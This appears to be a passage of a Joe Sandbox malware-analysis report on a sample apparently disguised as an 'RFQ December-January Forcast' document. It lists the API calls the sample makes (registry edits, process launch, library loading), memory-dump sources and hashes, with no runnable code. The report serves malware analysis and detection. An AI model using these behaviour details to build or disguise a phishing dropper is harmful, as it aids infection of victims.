                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1912718029-0
                                                                                                            • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                            • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                            • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                            • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849352358-0
                                                                                                            • Opcode ID: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                            • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                            • Opcode Fuzzy Hash: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                            • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401D59
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                            • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 3808545654-0
                                                                                                            • Opcode ID: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                            • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                            • Opcode Fuzzy Hash: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                            • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                            • wsprintfW.USER32 ref: 00404A1A
                                                                                                            • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s
                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                            • Opcode ID: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                            • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                            • Opcode Fuzzy Hash: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                            • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Timeout
                                                                                                            • String ID: !
                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                            • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                            • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                            • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                            • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                            • wsprintfW.USER32 ref: 00406411
                                                                                                            • LoadLibraryW.KERNEL32(?), ref: 00406421
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                            • String ID: %s%S.dll
                                                                                                            • API String ID: 2200240437-2744773210
                                                                                                            • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                            • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                            • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                            • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                            APIs
                                                                                                            • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                            • lstrlenW.KERNEL32(0040B5F0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateValuelstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1356686001-0
                                                                                                            • Opcode ID: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                            • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                            • Opcode Fuzzy Hash: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                            • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668
                                                                                                            APIs
                                                                                                              • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                              • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                              • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
                                                                                                              • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                              • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                              • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 3585118688-0
                                                                                                            • Opcode ID: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                            • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                            • Opcode Fuzzy Hash: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                            • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNEL32(?,0040A300,00441800), ref: 004056C6
                                                                                                            • GetLastError.KERNEL32 ref: 004056DA
                                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                            • GetLastError.KERNEL32 ref: 004056F9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                            • String ID:
                                                                                                            • API String ID: 3449924974-0
                                                                                                            • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                            • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                            • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                            • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(?,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                            • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                            • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                            • String ID:
                                                                                                            • API String ID: 2102729457-0
                                                                                                            • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                            • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                            • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                            • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                              • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                            • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                            • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                            • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                            • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                            • GetTempFileNameW.KERNEL32(0040A300,?,00000000,?,?,?,00000000,0040329E,00441000,00441800,00441800,00441800,00441800,00441800,00441800,004034CC), ref: 00405C92
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountFileNameTempTick
                                                                                                            • String ID: nsa
                                                                                                            • API String ID: 1716503409-2209301699
                                                                                                            • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                            • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                            • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                            • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                            • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                            Strings
                                                                                                            • Error launching installer, xrefs: 00405748
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                            • String ID: Error launching installer
                                                                                                            • API String ID: 3712363035-66219284
                                                                                                            • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                            • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                            • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                            • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                                            • API String ID: 0-2732225958
                                                                                                            • Opcode ID: c8a501881b8fff988eba9d8492afd702a213acde079b56b331dcde770a3352b8
                                                                                                            • Instruction ID: 331ae99c1d0d48334685262776f1e13265515ef686ba558848b66a9f45f81f6c
                                                                                                            • Opcode Fuzzy Hash: c8a501881b8fff988eba9d8492afd702a213acde079b56b331dcde770a3352b8
                                                                                                            • Instruction Fuzzy Hash: D3318270E0431D9FDF688B6988403EEFAF6AF94310F1540B5C549A7280EB708DC1CB92
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                                            • API String ID: 0-3001612457
                                                                                                            • Opcode ID: 3b718a96640b2bf9e40f605f04a9d5b34d5d89c1684b91a5f97c0df54260e097
                                                                                                            • Instruction ID: c218c74e8e220c7bfd2b642212eba35078e9b831aa9ee4ca50bf8cebc7bf7570
                                                                                                            • Opcode Fuzzy Hash: 3b718a96640b2bf9e40f605f04a9d5b34d5d89c1684b91a5f97c0df54260e097
                                                                                                            • Instruction Fuzzy Hash: A8019E31710919CF8B6C8A2DC444A6577EBAFC8B7972545BAE44ACF2A0DB31DC818782
                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                            • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 190613189-0
                                                                                                            • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                            • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                            • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                            • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9